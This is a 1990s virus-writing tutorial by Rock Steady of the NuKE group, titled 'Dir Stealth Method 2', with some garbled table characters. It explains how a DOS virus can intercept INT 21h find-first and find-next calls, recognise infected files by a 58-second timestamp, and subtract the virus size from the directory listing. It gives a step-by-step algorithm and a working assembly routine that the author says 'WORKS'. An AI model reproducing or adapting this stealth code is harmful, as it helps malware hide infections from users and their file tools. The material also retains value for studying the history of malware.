98 lines
7.1 KiB
Plaintext
98 lines
7.1 KiB
Plaintext
|
||
*******************************
|
||
** Dir Stealth Method 2 **
|
||
** **
|
||
** By Rock Steady/NuKE **
|
||
*******************************
|
||
|
||
Some May notice that when they use PCTOOLs (aka PCSHELL) or Peter Norton
|
||
Utilities, or *SOME* File Managing systems like DOS-Shell, the File
|
||
increase of infected files is know visable. There is no doubt about
|
||
it, if you only put Method #1 in your virus you will encounter times
|
||
were the file increase shows. Its not because your Routine isn't good!
|
||
But due to the fact that there is another way to Read the Dir Listing
|
||
by DOS. An this method is Call File-find by ASCIIZ format.
|
||
|
||
We just learned how to edit File-Find by FCB. Which is used by MS-DOS
|
||
PC-DOS and some other programs. But unlike the others, they use the
|
||
ASCIIZ file-Find method as it is EASIER to open, close, edite, and any
|
||
other file access routine is ALOT easier with the ASCIIZ or (File Handle)
|
||
system. So we will make our Virus Stealth to Method #2! Making us 100%
|
||
Stealth from file-finds...
|
||
|
||
The Function we have to Intecept is Interrupt 21h, with Functions
|
||
AH=4Eh (Find First Matching File) and AH=4F (Find Next Matching File)
|
||
The Way to go about it is Very much ALIKE to the first one, so just
|
||
understand the thoery, and you'll be able to program it within
|
||
seconds.
|
||
|
||
When this function is called, it will fill the current DTA with 12
|
||
entries totally 43 bytes. The DTA will be set up as follows: (below)
|
||
BTW: DTA is only a place DOS uses to do Disk Transfer Areas! It ISN'T
|
||
like the FCB, or PSP that is anyways the same! You can play with
|
||
this as you wish. You also use this DTA to read the Command Line
|
||
Parameters...etc...
|
||
|
||
Offset Size Description
|
||
<20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
||
00h <20> 1 <20> Drive Letter
|
||
01h <20> 11 <20> Seach Template (Eg:????????COM)
|
||
0Ch <20> 1 <20> Attribute Search
|
||
0Dh <20> 2 <20> Entry count within Directory
|
||
0Fh <20> 2 <20> Cluster Number of start of parent directory
|
||
11h <20> 4 <20> Reserved (Atleast Undocumented)
|
||
15h <20> 1 <20> Attribute of File FOUND
|
||
@ 16h <20> 2 <20> File's Time (Bits : SSSS-SMMM-MMMH-HHHH) Sec/2:Month:Year
|
||
18h <20> 2 <20> File's Date (Bits : DDDD-DMMM-MYYY-YYYY) Day:Month:Year
|
||
* 1Ah <20> 4 <20> File's Size (Word Reverse Order, Dah!!?!)
|
||
1Eh <20> 13 <20> ASCIIZ File name & Extension
|
||
* = Must be Edited by Virus is File Infected
|
||
@ = Needed to Check if File is Infected. (Seconds Field)
|
||
|
||
%Algorthm%
|
||
~~~~~~~~~~
|
||
CONDISTION: DS:DX points to ASCIIZ of file search.
|
||
CX: Contains File Attributes
|
||
|
||
Step 1. Call Dos so it fills the DTA with its findings
|
||
Step 2. Test for CF=1 (Carry Flag) as error happened
|
||
errors happen if File not found, no more files etc...
|
||
Step 3. Get Seconds Field And UnMask Seconds
|
||
Step 4. Check if seconds = 58 (What ever your using) Quit if NOT
|
||
Notice we use `XOR AL,1Dh' rather than `CMP AL,1Dh'
|
||
Check in your ASM Bible, which is Faster? Size?
|
||
Remember speed & size is EVERYTHING, That is why
|
||
My lastest are quite small viriis for stealthness!!
|
||
Step 5. If Infected Subtract Virus Size from File
|
||
Step 6. Quit
|
||
|
||
;This is the routine. once you get AH=4Eh/4Fh in you Int 21h Call this
|
||
;Routine... (Look at Method #1 for Int21h handler)
|
||
Dir_Stealth2
|
||
pushf ;Fake an Int Call
|
||
push cs ;Save our location
|
||
call int21Call ;Step #1
|
||
jc no_good ;Error Split
|
||
push ax
|
||
push bx
|
||
push es
|
||
mov ah,51h ;Get Current DTA
|
||
int 21h ;ES:BX --> DTA
|
||
|
||
mov ax,es:[bx+16h] ;Get File Time
|
||
and ax,1fh ;Un Mask Seconds field
|
||
xor al,1dh ;Is it 58 Seconds?
|
||
jnz not_infected ;Not infected! Dah?
|
||
sub es:[bx+1Ah],Virus_Size ;Minus Virus Size!
|
||
sbb es:[bx+1Ch],0 ;Fix up the Sub, Carrying!
|
||
not_infected:
|
||
pop es
|
||
pop bx ;Restore Registers
|
||
pop ax
|
||
no_Good:iret
|
||
; This code WORKS and is also 100% (c) Rock Steady / NuKE
|
||
;--------------------------EnD-------------------------------
|
||
|
||
Rock Steady
|
||
`WaTch OuT WaReZ PuPpiEs NuKE PoX V2.0 WiLl GeTcHa'
|